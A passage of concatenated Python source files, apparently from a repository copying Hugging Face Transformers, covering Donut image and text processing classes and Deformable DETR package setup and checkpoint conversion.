    # Command-line entry point: convert an original donut-python checkpoint to
    # the Hugging Face format and optionally push it to the hub.
    parser = argparse.ArgumentParser()
    # Required parameters
    parser.add_argument(
        "--model_name",
        default="naver-clova-ix/donut-base-finetuned-docvqa",
        required=False,
        type=str,
        help="Name of the original model you'd like to convert.",
    )
    parser.add_argument(
        "--pytorch_dump_folder_path",
        default=None,
        required=False,
        type=str,
        help="Path to the output PyTorch model directory.",
    )
    parser.add_argument(
        "--push_to_hub",
        action="store_true",
        help="Whether or not to push the converted model and processor to the 🤗 hub.",
    )
    args = parser.parse_args()
    convert_donut_checkpoint(args.model_name, args.pytorch_dump_folder_path, args.push_to_hub)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,179 | src/transformers/models/donut/feature_extraction_donut.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for Donut."""
import warnings
from ...utils import logging
from .image_processing_donut import DonutImageProcessor
logger = logging.get_logger(__name__)
class DonutFeatureExtractor(DonutImageProcessor):
    """Deprecated alias of `DonutImageProcessor`, kept for backward compatibility.

    Instantiating it emits a `FutureWarning`; it is scheduled for removal in
    Transformers v5. It adds no behavior of its own.
    """

    def __init__(self, *args, **kwargs) -> None:
        warnings.warn(
            "The class DonutFeatureExtractor is deprecated and will be removed in version 5 of Transformers. Please"
            " use DonutImageProcessor instead.",
            FutureWarning,
        )
        super().__init__(*args, **kwargs)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 8,062 | src/transformers/models/donut/processing_donut.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Processor class for Donut.
"""
import re
import warnings
from contextlib import contextmanager
from ...processing_utils import ProcessorMixin
class DonutProcessor(ProcessorMixin):
r"""
Constructs a Donut processor which wraps a Donut image processor and an XLMRoBERTa tokenizer into a single
processor.
[`DonutProcessor`] offers all the functionalities of [`DonutImageProcessor`] and
[`XLMRobertaTokenizer`/`XLMRobertaTokenizerFast`]. See the [`~DonutProcessor.__call__`] and
[`~DonutProcessor.decode`] for more information.
Args:
image_processor ([`DonutImageProcessor`]):
An instance of [`DonutImageProcessor`]. The image processor is a required input.
tokenizer ([`XLMRobertaTokenizer`/`XLMRobertaTokenizerFast`]):
An instance of [`XLMRobertaTokenizer`/`XLMRobertaTokenizerFast`]. The tokenizer is a required input.
"""
attributes = ["image_processor", "tokenizer"]
image_processor_class = "AutoImageProcessor"
tokenizer_class = "AutoTokenizer"
    def __init__(self, image_processor=None, tokenizer=None, **kwargs):
        # Backward compatibility: accept the deprecated `feature_extractor`
        # kwarg as an alias for `image_processor`.
        if "feature_extractor" in kwargs:
            warnings.warn(
                "The `feature_extractor` argument is deprecated and will be removed in v5, use `image_processor`"
                " instead.",
                FutureWarning,
            )
            feature_extractor = kwargs.pop("feature_extractor")
        # NOTE(review): if neither `image_processor` nor `feature_extractor` is
        # given, the line below raises NameError before the friendlier
        # ValueError — confirm whether that is intended.
        image_processor = image_processor if image_processor is not None else feature_extractor
        if image_processor is None:
            raise ValueError("You need to specify an `image_processor`.")
        if tokenizer is None:
            raise ValueError("You need to specify a `tokenizer`.")
        super().__init__(image_processor, tokenizer)
        # `current_processor` is what `__call__` dispatches to; it is swapped
        # to the tokenizer while inside `as_target_processor`.
        self.current_processor = self.image_processor
        self._in_target_context_manager = False
    def __call__(self, *args, **kwargs):
        """
        When used in normal mode, this method forwards all its arguments to AutoImageProcessor's
        [`~AutoImageProcessor.__call__`] and returns its output. If used in the context
        [`~DonutProcessor.as_target_processor`] this method forwards all its arguments to DonutTokenizer's
        [`~DonutTokenizer.__call__`]. Please refer to the docstring of the above two methods for more information.
        """
        # For backward compatibility
        if self._in_target_context_manager:
            return self.current_processor(*args, **kwargs)
        images = kwargs.pop("images", None)
        text = kwargs.pop("text", None)
        # Legacy positional call: the first positional argument is the images.
        if len(args) > 0:
            images = args[0]
            args = args[1:]
        if images is None and text is None:
            raise ValueError("You need to specify either an `images` or `text` input to process.")
        if images is not None:
            inputs = self.image_processor(images, *args, **kwargs)
        if text is not None:
            encodings = self.tokenizer(text, **kwargs)
        # Return image features, text encodings, or both (text ids as labels).
        if text is None:
            return inputs
        elif images is None:
            return encodings
        else:
            inputs["labels"] = encodings["input_ids"]
            return inputs
def batch_decode(self, *args, **kwargs):
"""
This method forwards all its arguments to DonutTokenizer's [`~PreTrainedTokenizer.batch_decode`]. Please refer
to the docstring of this method for more information.
"""
return self.tokenizer.batch_decode(*args, **kwargs)
def decode(self, *args, **kwargs):
"""
This method forwards all its arguments to DonutTokenizer's [`~PreTrainedTokenizer.decode`]. Please refer to the
docstring of this method for more information.
"""
return self.tokenizer.decode(*args, **kwargs)
    @contextmanager
    def as_target_processor(self):
        """
        Temporarily sets the tokenizer for processing the input. Useful for encoding the labels when fine-tuning TrOCR.
        """
        warnings.warn(
            "`as_target_processor` is deprecated and will be removed in v5 of Transformers. You can process your "
            "labels by using the argument `text` of the regular `__call__` method (either in the same call as "
            "your images inputs, or in a separate call."
        )
        # Swap `current_processor` to the tokenizer for the duration of the
        # `with` block, then restore the image processor afterwards.
        # NOTE(review): there is no try/finally here, so an exception inside
        # the `with` block leaves the processor in tokenizer mode.
        self._in_target_context_manager = True
        self.current_processor = self.tokenizer
        yield
        self.current_processor = self.image_processor
        self._in_target_context_manager = False
    def token2json(self, tokens, is_inner_value=False, added_vocab=None):
        """
        Convert a (generated) token sequence into an ordered JSON format.

        Args:
            tokens (`str`):
                Generated sequence containing `<s_key>...</s_key>` spans; nested spans become nested dicts and
                `<sep/>`-separated leaves become lists.
            is_inner_value (`bool`, *optional*, defaults to `False`):
                Recursion flag: inner calls return a list of parsed values instead of a single dict.
            added_vocab (*optional*):
                Added-token vocabulary (as returned by `tokenizer.get_added_vocab()`); fetched from the tokenizer when
                not provided.
        """
        if added_vocab is None:
            added_vocab = self.tokenizer.get_added_vocab()

        output = {}

        # Repeatedly consume the leading `<s_key>...</s_key>` span from `tokens`.
        while tokens:
            start_token = re.search(r"<s_(.*?)>", tokens, re.IGNORECASE)
            if start_token is None:
                break
            key = start_token.group(1)
            end_token = re.search(rf"</s_{key}>", tokens, re.IGNORECASE)
            start_token = start_token.group()
            if end_token is None:
                # Unclosed span: drop the dangling start token and keep scanning.
                tokens = tokens.replace(start_token, "")
            else:
                end_token = end_token.group()
                start_token_escaped = re.escape(start_token)
                end_token_escaped = re.escape(end_token)
                content = re.search(f"{start_token_escaped}(.*?){end_token_escaped}", tokens, re.IGNORECASE)
                if content is not None:
                    content = content.group(1).strip()
                    if r"<s_" in content and r"</s_" in content:  # non-leaf node
                        # Recurse into the nested span; a single-element list collapses to its element.
                        value = self.token2json(content, is_inner_value=True, added_vocab=added_vocab)
                        if value:
                            if len(value) == 1:
                                value = value[0]
                            output[key] = value
                    else:  # leaf nodes
                        output[key] = []
                        for leaf in content.split(r"<sep/>"):
                            leaf = leaf.strip()
                            if leaf in added_vocab and leaf[0] == "<" and leaf[-2:] == "/>":
                                leaf = leaf[1:-2]  # for categorical special tokens
                            output[key].append(leaf)
                        if len(output[key]) == 1:
                            output[key] = output[key][0]

                # Continue after the closing tag; a `<sep/>` here means siblings at this level.
                tokens = tokens[tokens.find(end_token) + len(end_token) :].strip()
                if tokens[:6] == r"<sep/>":  # non-leaf nodes
                    return [output] + self.token2json(tokens[6:], is_inner_value=True, added_vocab=added_vocab)

        if len(output):
            return [output] if is_inner_value else output
        else:
            # Nothing structured was parsed: fall back to the raw remaining text.
            return [] if is_inner_value else {"text_sequence": tokens}
    @property
    def feature_extractor_class(self):
        # Deprecated alias kept for backward compatibility with the feature-extractor naming.
        warnings.warn(
            "`feature_extractor_class` is deprecated and will be removed in v5. Use `image_processor_class` instead.",
            FutureWarning,
        )
        return self.image_processor_class
    @property
    def feature_extractor(self):
        # Deprecated alias kept for backward compatibility with the feature-extractor naming.
        warnings.warn(
            "`feature_extractor` is deprecated and will be removed in v5. Use `image_processor` instead.",
            FutureWarning,
        )
        return self.image_processor
|
27182812/ChatGLM-LLaMA-chinese-insturct | 20,162 | src/transformers/models/donut/image_processing_donut.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image processor class for Donut."""
from typing import Dict, List, Optional, Union
import numpy as np
from ...image_processing_utils import BaseImageProcessor, BatchFeature, get_size_dict
from ...image_transforms import (
get_resize_output_image_size,
normalize,
pad,
rescale,
resize,
to_channel_dimension_format,
)
from ...image_utils import (
IMAGENET_STANDARD_MEAN,
IMAGENET_STANDARD_STD,
ChannelDimension,
ImageInput,
PILImageResampling,
get_image_size,
make_list_of_images,
to_numpy_array,
valid_images,
)
from ...utils import TensorType, logging
from ...utils.import_utils import is_vision_available
logger = logging.get_logger(__name__)
if is_vision_available():
import PIL
class DonutImageProcessor(BaseImageProcessor):
    r"""
    Constructs a Donut image processor.

    Args:
        do_resize (`bool`, *optional*, defaults to `True`):
            Whether to resize the image's (height, width) dimensions to the specified `size`. Can be overridden by
            `do_resize` in the `preprocess` method.
        size (`Dict[str, int]` *optional*, defaults to `{"height": 2560, "width": 1920}`):
            Size of the image after resizing. The shortest edge of the image is resized to min(size["height"],
            size["width"]), with the longest edge resized to keep the input aspect ratio. Can be overridden by `size`
            in the `preprocess` method.
        resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BILINEAR`):
            Resampling filter to use if resizing the image. Can be overridden by `resample` in the `preprocess` method.
        do_thumbnail (`bool`, *optional*, defaults to `True`):
            Whether to resize the image using thumbnail method. Can be overridden by `do_thumbnail` in the
            `preprocess` method.
        do_align_long_axis (`bool`, *optional*, defaults to `False`):
            Whether to align the long axis of the image with the long axis of `size` by rotating by 90 degrees. Can be
            overridden by `do_align_long_axis` in the `preprocess` method.
        do_pad (`bool`, *optional*, defaults to `True`):
            Whether to pad the image to the specified `size`. Can be overridden by `do_pad` in the `preprocess`
            method.
        do_rescale (`bool`, *optional*, defaults to `True`):
            Whether to rescale the image by the specified scale `rescale_factor`. Can be overridden by `do_rescale` in
            the `preprocess` method.
        rescale_factor (`int` or `float`, *optional*, defaults to `1/255`):
            Scale factor to use if rescaling the image. Can be overridden by `rescale_factor` in the `preprocess`
            method.
        do_normalize (`bool`, *optional*, defaults to `True`):
            Whether to normalize the image. Can be overridden by `do_normalize` in the `preprocess` method.
        image_mean (`float` or `List[float]`, *optional*, defaults to `IMAGENET_STANDARD_MEAN`):
            Mean to use if normalizing the image. This is a float or list of floats the length of the number of
            channels in the image. Can be overridden by the `image_mean` parameter in the `preprocess` method.
        image_std (`float` or `List[float]`, *optional*, defaults to `IMAGENET_STANDARD_STD`):
            Standard deviation to use if normalizing the image. This is a float or list of floats the length of the
            number of channels in the image. Can be overridden by the `image_std` parameter in the `preprocess` method.
    """

    model_input_names = ["pixel_values"]
    def __init__(
        self,
        do_resize: bool = True,
        size: Dict[str, int] = None,
        resample: PILImageResampling = PILImageResampling.BILINEAR,
        do_thumbnail: bool = True,
        do_align_long_axis: bool = False,
        do_pad: bool = True,
        do_rescale: bool = True,
        rescale_factor: Union[int, float] = 1 / 255,
        do_normalize: bool = True,
        image_mean: Optional[Union[float, List[float]]] = None,
        image_std: Optional[Union[float, List[float]]] = None,
        **kwargs,
    ) -> None:
        super().__init__(**kwargs)

        # Donut's default target resolution (height x width).
        size = size if size is not None else {"height": 2560, "width": 1920}
        if isinstance(size, (tuple, list)):
            # The previous feature extractor size parameter was in (width, height) format
            size = size[::-1]
        size = get_size_dict(size)

        self.do_resize = do_resize
        self.size = size
        self.resample = resample
        self.do_thumbnail = do_thumbnail
        self.do_align_long_axis = do_align_long_axis
        self.do_pad = do_pad
        self.do_rescale = do_rescale
        self.rescale_factor = rescale_factor
        self.do_normalize = do_normalize
        # Fall back to ImageNet normalization statistics when none are supplied.
        self.image_mean = image_mean if image_mean is not None else IMAGENET_STANDARD_MEAN
        self.image_std = image_std if image_std is not None else IMAGENET_STANDARD_STD
def align_long_axis(
self, image: np.ndarray, size: Dict[str, int], data_format: Optional[Union[str, ChannelDimension]] = None
) -> np.ndarray:
"""
Align the long axis of the image to the longest axis of the specified size.
Args:
image (`np.ndarray`):
The image to be aligned.
size (`Dict[str, int]`):
The size `{"height": h, "width": w}` to align the long axis to.
Returns:
`np.ndarray`: The aligned image.
"""
input_height, input_width = get_image_size(image)
output_height, output_width = size["height"], size["width"]
if (output_width < output_height and input_width > input_height) or (
output_width > output_height and input_width < input_height
):
image = np.rot90(image, 3)
if data_format is not None:
image = to_channel_dimension_format(image, data_format)
return image
    def rotate_image(self, *args, **kwargs):
        # Deprecated alias for `align_long_axis`, kept for backward compatibility.
        logger.info(
            "rotate_image is deprecated and will be removed in version 4.27. Please use align_long_axis instead."
        )
        return self.align_long_axis(*args, **kwargs)
def pad_image(
self,
image: np.ndarray,
size: Dict[str, int],
random_padding: bool = False,
data_format: Optional[Union[str, ChannelDimension]] = None,
) -> np.ndarray:
"""
Pad the image to the specified size.
Args:
image (`np.ndarray`):
The image to be padded.
size (`Dict[str, int]`):
The size `{"height": h, "width": w}` to pad the image to.
random_padding (`bool`, *optional*, defaults to `False`):
Whether to use random padding or not.
data_format (`str` or `ChannelDimension`, *optional*):
The data format of the output image. If unset, the same format as the input image is used.
"""
output_height, output_width = size["height"], size["width"]
input_height, input_width = get_image_size(image)
delta_width = output_width - input_width
delta_height = output_height - input_height
if random_padding:
pad_top = np.random.randint(low=0, high=delta_height + 1)
pad_left = np.random.randint(low=0, high=delta_width + 1)
else:
pad_top = delta_height // 2
pad_left = delta_width // 2
pad_bottom = delta_height - pad_top
pad_right = delta_width - pad_left
padding = ((pad_top, pad_bottom), (pad_left, pad_right))
return pad(image, padding, data_format=data_format)
    def pad(self, *args, **kwargs):
        # Deprecated alias for `pad_image`, kept for backward compatibility.
        logger.info("pad is deprecated and will be removed in version 4.27. Please use pad_image instead.")
        return self.pad_image(*args, **kwargs)
def thumbnail(
self,
image: np.ndarray,
size: Dict[str, int],
resample: PILImageResampling = PILImageResampling.BICUBIC,
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Resize the image to make a thumbnail. The image is resized so that no dimension is larger than any
corresponding dimension of the specified size.
Args:
image (`np.ndarray`):
The image to be resized.
size (`Dict[str, int]`):
The size `{"height": h, "width": w}` to resize the image to.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BICUBIC`):
The resampling filter to use.
data_format (`Optional[Union[str, ChannelDimension]]`, *optional*):
The data format of the output image. If unset, the same format as the input image is used.
"""
input_height, input_width = get_image_size(image)
output_height, output_width = size["height"], size["width"]
# We always resize to the smallest of either the input or output size.
height = min(input_height, output_height)
width = min(input_width, output_width)
if height == input_height and width == input_width:
return image
if input_height > input_width:
width = int(input_width * height / input_height)
elif input_width > input_height:
height = int(input_height * width / input_width)
return resize(
image, size=(height, width), resample=resample, reducing_gap=2.0, data_format=data_format, **kwargs
)
def resize(
self,
image: np.ndarray,
size: Dict[str, int],
resample: PILImageResampling = PILImageResampling.BICUBIC,
data_format: Optional[Union[str, ChannelDimension]] = None,
**kwargs,
) -> np.ndarray:
"""
Resize an image. The shortest edge of the image is resized to size["shortest_edge"], with the longest edge
resized to keep the input aspect ratio.
Args:
image (`np.ndarray`):
Image to resize.
size (`Dict[str, int]`):
Size of the output image.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BICUBIC`):
Resampling filter to use when resiizing the image.
data_format (`str` or `ChannelDimension`, *optional*):
The channel dimension format of the image. If not provided, it will be the same as the input image.
"""
size = get_size_dict(size)
shortest_edge = min(size["height"], size["width"])
output_size = get_resize_output_image_size(image, size=shortest_edge, default_to_square=False)
resized_image = resize(image, size=output_size, resample=resample, data_format=data_format, **kwargs)
return resized_image
    def rescale(
        self,
        image: np.ndarray,
        scale: Union[int, float],
        data_format: Optional[Union[str, ChannelDimension]] = None,
        **kwargs,
    ) -> np.ndarray:
        """
        Rescale an image by a scale factor. image = image * scale.

        Args:
            image (`np.ndarray`):
                Image to rescale.
            scale (`int` or `float`):
                Scale to apply to the image.
            data_format (`str` or `ChannelDimension`, *optional*):
                The channel dimension format of the image. If not provided, it will be the same as the input image.
        """
        # Thin wrapper around the module-level `rescale` transform.
        return rescale(image, scale=scale, data_format=data_format, **kwargs)
    def normalize(
        self,
        image: np.ndarray,
        mean: Union[float, List[float]],
        std: Union[float, List[float]],
        data_format: Optional[Union[str, ChannelDimension]] = None,
        **kwargs,
    ) -> np.ndarray:
        """
        Normalize an image. image = (image - mean) / std.

        Args:
            image (`np.ndarray`):
                Image to normalize.
            mean (`float` or `List[float]`):
                Image mean.
            std (`float` or `List[float]`):
                Image standard deviation.
            data_format (`str` or `ChannelDimension`, *optional*):
                The channel dimension format of the image. If not provided, it will be the same as the input image.
        """
        # Thin wrapper around the module-level `normalize` transform.
        return normalize(image, mean=mean, std=std, data_format=data_format, **kwargs)
    def preprocess(
        self,
        images: ImageInput,
        do_resize: bool = None,
        size: Dict[str, int] = None,
        resample: PILImageResampling = None,
        do_thumbnail: bool = None,
        do_align_long_axis: bool = None,
        do_pad: bool = None,
        random_padding: bool = False,
        do_rescale: bool = None,
        rescale_factor: float = None,
        do_normalize: bool = None,
        image_mean: Optional[Union[float, List[float]]] = None,
        image_std: Optional[Union[float, List[float]]] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        data_format: Optional[ChannelDimension] = ChannelDimension.FIRST,
        **kwargs,
    ) -> BatchFeature:
        """
        Preprocess an image or batch of images.

        Args:
            images (`ImageInput`):
                Image to preprocess.
            do_resize (`bool`, *optional*, defaults to `self.do_resize`):
                Whether to resize the image.
            size (`Dict[str, int]`, *optional*, defaults to `self.size`):
                Size of the image after resizing. Shortest edge of the image is resized to min(size["height"],
                size["width"]) with the longest edge resized to keep the input aspect ratio.
            resample (`int`, *optional*, defaults to `self.resample`):
                Resampling filter to use if resizing the image. This can be one of the enum `PILImageResampling`. Only
                has an effect if `do_resize` is set to `True`.
            do_thumbnail (`bool`, *optional*, defaults to `self.do_thumbnail`):
                Whether to resize the image using thumbnail method.
            do_align_long_axis (`bool`, *optional*, defaults to `self.do_align_long_axis`):
                Whether to align the long axis of the image with the long axis of `size` by rotating by 90 degrees.
            do_pad (`bool`, *optional*, defaults to `self.do_pad`):
                Whether to pad the image. If `random_padding` is set to `True`, each image is padded with a random
                amont of padding on each size, up to the largest image size in the batch. Otherwise, all images are
                padded to the largest image size in the batch.
            random_padding (`bool`, *optional*, defaults to `False`):
                Whether to use random padding when padding the image. If `True`, each image in the batch with be padded
                with a random amount of padding on each side up to the size of the largest image in the batch.
            do_rescale (`bool`, *optional*, defaults to `self.do_rescale`):
                Whether to rescale the image pixel values.
            rescale_factor (`float`, *optional*, defaults to `self.rescale_factor`):
                Rescale factor to rescale the image by if `do_rescale` is set to `True`.
            do_normalize (`bool`, *optional*, defaults to `self.do_normalize`):
                Whether to normalize the image.
            image_mean (`float` or `List[float]`, *optional*, defaults to `self.image_mean`):
                Image mean to use for normalization.
            image_std (`float` or `List[float]`, *optional*, defaults to `self.image_std`):
                Image standard deviation to use for normalization.
            return_tensors (`str` or `TensorType`, *optional*):
                The type of tensors to return. Can be one of:
                    - Unset: Return a list of `np.ndarray`.
                    - `TensorType.TENSORFLOW` or `'tf'`: Return a batch of type `tf.Tensor`.
                    - `TensorType.PYTORCH` or `'pt'`: Return a batch of type `torch.Tensor`.
                    - `TensorType.NUMPY` or `'np'`: Return a batch of type `np.ndarray`.
                    - `TensorType.JAX` or `'jax'`: Return a batch of type `jax.numpy.ndarray`.
            data_format (`ChannelDimension` or `str`, *optional*, defaults to `ChannelDimension.FIRST`):
                The channel dimension format for the output image. Can be one of:
                    - `ChannelDimension.FIRST`: image in (num_channels, height, width) format.
                    - `ChannelDimension.LAST`: image in (height, width, num_channels) format.
                    - Unset: defaults to the channel dimension format of the input image.
        """
        # Resolve every option against the instance defaults.
        do_resize = do_resize if do_resize is not None else self.do_resize
        size = size if size is not None else self.size
        if isinstance(size, (tuple, list)):
            # Previous feature extractor had size in (width, height) format
            size = size[::-1]
        size = get_size_dict(size)
        resample = resample if resample is not None else self.resample
        do_thumbnail = do_thumbnail if do_thumbnail is not None else self.do_thumbnail
        do_align_long_axis = do_align_long_axis if do_align_long_axis is not None else self.do_align_long_axis
        do_pad = do_pad if do_pad is not None else self.do_pad
        do_rescale = do_rescale if do_rescale is not None else self.do_rescale
        rescale_factor = rescale_factor if rescale_factor is not None else self.rescale_factor
        do_normalize = do_normalize if do_normalize is not None else self.do_normalize
        image_mean = image_mean if image_mean is not None else self.image_mean
        image_std = image_std if image_std is not None else self.image_std

        images = make_list_of_images(images)

        if not valid_images(images):
            raise ValueError(
                "Invalid image type. Must be of type PIL.Image.Image, numpy.ndarray, "
                "torch.Tensor, tf.Tensor or jax.ndarray."
            )

        # Validate that every enabled step has the parameters it needs.
        if do_resize and size is None:
            raise ValueError("Size must be specified if do_resize is True.")

        if do_rescale and rescale_factor is None:
            raise ValueError("Rescale factor must be specified if do_rescale is True.")

        if do_pad and size is None:
            raise ValueError("Size must be specified if do_pad is True.")

        if do_normalize and (image_mean is None or image_std is None):
            raise ValueError("Image mean and std must be specified if do_normalize is True.")

        # All transformations expect numpy arrays.
        images = [to_numpy_array(image) for image in images]

        # Transformation pipeline: rotate -> resize -> thumbnail -> pad -> rescale -> normalize.
        if do_align_long_axis:
            images = [self.align_long_axis(image, size=size) for image in images]

        if do_resize:
            images = [self.resize(image=image, size=size, resample=resample) for image in images]

        if do_thumbnail:
            images = [self.thumbnail(image=image, size=size) for image in images]

        if do_pad:
            images = [self.pad_image(image=image, size=size, random_padding=random_padding) for image in images]

        if do_rescale:
            images = [self.rescale(image=image, scale=rescale_factor) for image in images]

        if do_normalize:
            images = [self.normalize(image=image, mean=image_mean, std=image_std) for image in images]

        images = [to_channel_dimension_format(image, data_format) for image in images]

        data = {"pixel_values": images}
        return BatchFeature(data=data, tensor_type=return_tensors)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,596 | src/transformers/models/deformable_detr/__init__.py | # Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_timm_available, is_vision_available
# Map of submodule -> exported names, consumed by `_LazyModule` below.
# The configuration is always importable; the other entries are added only
# when their optional dependencies are present.
_import_structure = {
    "configuration_deformable_detr": ["DEFORMABLE_DETR_PRETRAINED_CONFIG_ARCHIVE_MAP", "DeformableDetrConfig"],
}

# Image-processing classes require the vision dependencies.
try:
    if not is_vision_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["feature_extraction_deformable_detr"] = ["DeformableDetrFeatureExtractor"]
    _import_structure["image_processing_deformable_detr"] = ["DeformableDetrImageProcessor"]

# Modeling classes require timm.
try:
    if not is_timm_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_deformable_detr"] = [
        "DEFORMABLE_DETR_PRETRAINED_MODEL_ARCHIVE_LIST",
        "DeformableDetrForObjectDetection",
        "DeformableDetrModel",
        "DeformableDetrPreTrainedModel",
    ]

# Static type checkers see the real imports; at runtime the module is replaced
# by a lazy proxy that only imports a submodule on first attribute access.
if TYPE_CHECKING:
    from .configuration_deformable_detr import DEFORMABLE_DETR_PRETRAINED_CONFIG_ARCHIVE_MAP, DeformableDetrConfig

    try:
        if not is_vision_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .feature_extraction_deformable_detr import DeformableDetrFeatureExtractor
        from .image_processing_deformable_detr import DeformableDetrImageProcessor

    try:
        if not is_timm_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_deformable_detr import (
            DEFORMABLE_DETR_PRETRAINED_MODEL_ARCHIVE_LIST,
            DeformableDetrForObjectDetection,
            DeformableDetrModel,
            DeformableDetrPreTrainedModel,
        )

else:
    import sys

    sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 9,490 | src/transformers/models/deformable_detr/convert_deformable_detr_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert Deformable DETR checkpoints."""
import argparse
import json
from pathlib import Path
import requests
import torch
from huggingface_hub import cached_download, hf_hub_url
from PIL import Image
from transformers import DeformableDetrConfig, DeformableDetrFeatureExtractor, DeformableDetrForObjectDetection
from transformers.utils import logging
logging.set_verbosity_info()
logger = logging.get_logger(__name__)
def rename_key(orig_key):
    """Map one key of the original Deformable DETR checkpoint to the HF naming scheme."""
    key = orig_key

    # Backbone and transformer prefixes.
    if "backbone.0.body" in key:
        key = key.replace("backbone.0.body", "backbone.conv_encoder.model")
    if "transformer" in key:
        key = key.replace("transformer.", "")

    # Layer norms: the meaning of norm1/norm2 differs between encoder and decoder layers.
    if "norm1" in key:
        key = key.replace("norm1", "self_attn_layer_norm" if "encoder" in key else "encoder_attn_layer_norm")
    if "norm2" in key:
        key = key.replace("norm2", "final_layer_norm" if "encoder" in key else "self_attn_layer_norm")
    if "norm3" in key:
        key = key.replace("norm3", "final_layer_norm")

    # Straightforward one-to-one renames.
    for old, new in (
        ("linear1", "fc1"),
        ("linear2", "fc2"),
        ("query_embed", "query_position_embeddings"),
        ("cross_attn", "encoder_attn"),
    ):
        if old in key:
            key = key.replace(old, new)

    return key
def read_in_q_k_v(state_dict):
    """
    Split the fused in-projection of the 6 decoder self-attention layers into separate
    q/k/v projections (in place): rows [0:256) -> q, [256:512) -> k, last 256 -> v.
    """
    projections = (
        ("q_proj", slice(None, 256)),
        ("k_proj", slice(256, 512)),
        ("v_proj", slice(-256, None)),
    )
    for layer in range(6):
        prefix = f"decoder.layers.{layer}.self_attn"
        # Remove the fused parameters; they are replaced by the per-projection ones below.
        fused_weight = state_dict.pop(f"{prefix}.in_proj_weight")
        fused_bias = state_dict.pop(f"{prefix}.in_proj_bias")
        for name, rows in projections:
            state_dict[f"{prefix}.{name}.weight"] = fused_weight[rows, :]
            state_dict[f"{prefix}.{name}.bias"] = fused_bias[rows]
# We will verify our results on an image of cute cats
def prepare_img():
    """Download and return the standard COCO cats image used to sanity-check the conversion."""
    url = "http://images.cocodataset.org/val2017/000000039769.jpg"
    response = requests.get(url, stream=True)
    return Image.open(response.raw)
@torch.no_grad()
def convert_deformable_detr_checkpoint(
    checkpoint_path,
    single_scale,
    dilation,
    with_box_refine,
    two_stage,
    pytorch_dump_folder_path,
    push_to_hub,
):
    """
    Copy/paste/tweak model's weights to our Deformable DETR structure.

    Args:
        checkpoint_path (`str`): Path to the original `.pth` checkpoint to convert.
        single_scale (`bool`): If `True`, sets `config.num_feature_levels = 1`.
        dilation (`bool`): Value for `config.dilation`.
        with_box_refine (`bool`): Value for `config.with_box_refine`.
        two_stage (`bool`): Value for `config.two_stage`.
        pytorch_dump_folder_path (`str`): Folder where the converted model and feature extractor are saved.
        push_to_hub (`bool`): Whether to also push the converted model to the hub.

    Raises:
        AssertionError: If the converted model's outputs do not match the reference values for this variant.
    """
    # load default config
    config = DeformableDetrConfig()
    # set config attributes
    if single_scale:
        config.num_feature_levels = 1
    config.dilation = dilation
    config.with_box_refine = with_box_refine
    config.two_stage = two_stage
    # set labels (91 COCO detection classes)
    config.num_labels = 91
    repo_id = "huggingface/label-files"
    filename = "coco-detection-id2label.json"
    id2label = json.load(open(cached_download(hf_hub_url(repo_id, filename, repo_type="dataset")), "r"))
    id2label = {int(k): v for k, v in id2label.items()}
    config.id2label = id2label
    config.label2id = {v: k for k, v in id2label.items()}

    # load feature extractor
    feature_extractor = DeformableDetrFeatureExtractor(format="coco_detection")

